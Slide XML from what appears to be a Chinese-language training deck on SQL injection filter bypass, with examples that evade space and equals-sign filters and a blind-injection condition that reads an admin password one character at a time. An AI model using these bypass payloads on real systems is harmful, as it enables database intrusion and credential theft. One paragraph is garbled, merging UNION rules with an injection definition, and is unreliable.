            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Afrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后面必须是空格再加表名，因此为了不让你使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可能正则表达式会检测后面的空格，我们可以用科学计数法绕过，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1e0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后面可以没有空格</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select A,1 from B ==&gt; select A,1E0fromB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select A,1 from B ==&gt; select A,1.0fromB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1013137317"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="1258515"/>
            <a:ext cx="3094312" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>代替等号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的多种方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CF1265-5E5C-4E83-87EE-A1A2C4784DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="1914037"/>
            <a:ext cx="2931460" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>结合</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94EAFF5F-4C1A-46DA-933D-1DDE31D186E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931666" y="3784357"/>
            <a:ext cx="11079822" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where !(id&lt;&gt;1)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  select pass from user where id =1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A79AC5DB-8123-4013-BFC7-6C1CBD97D2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931665" y="4505464"/>
            <a:ext cx="11628783" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>!(ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>((select password from admin) from 1))&lt;&gt;53)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>((select password from admin) from 1))=53</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF7021A-8B40-4FF4-9D20-0BC50F360D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="3226777"/>
            <a:ext cx="744734" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54BA40F1-5C91-434B-A01D-FCB8D80A8A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2776993" y="2522260"/>
            <a:ext cx="7116194" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>注：在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>&lt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>表示不相等 而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>表示非</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4019443649"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
